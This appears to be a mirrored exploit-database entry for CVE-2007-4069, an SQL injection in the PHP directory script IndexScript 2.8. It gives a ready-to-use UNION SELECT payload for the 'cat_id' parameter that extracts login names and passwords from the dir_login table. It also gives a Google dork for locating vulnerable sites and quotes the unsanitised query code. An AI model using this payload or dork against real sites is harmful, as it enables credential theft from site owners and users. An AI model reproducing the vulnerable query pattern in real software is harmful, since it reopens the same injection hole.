[] NeoSense
E X P L O I T S
title author type platform port cve id

IndexScript 2.8 - 'cat_id' SQL Injection

Author: xssvgamer
type: webapps
platform: php
port: 
date_added: 2007-07-24 
date_updated: 2016-12-26 
verified: 1 
codes: OSVDB-36285;CVE-2007-4069 
tags: 
aliases:  
screenshot_url:  
application_url: 
Site: http://indexscript.com
Found By: xssvgamer

Google Dork: allintext: "This site is powered by IndexScript"

exploit:

http://www.example.com/show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*

Blind SQL injection in indexscript..

Vul Code:
"$sql = "select name, meta_title, meta_description, meta_keywords from dir_cat where " .
 "cat_id=" . fnpreparesql($_GET['cat_id']);"

# milw0rm.com [2007-07-25]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.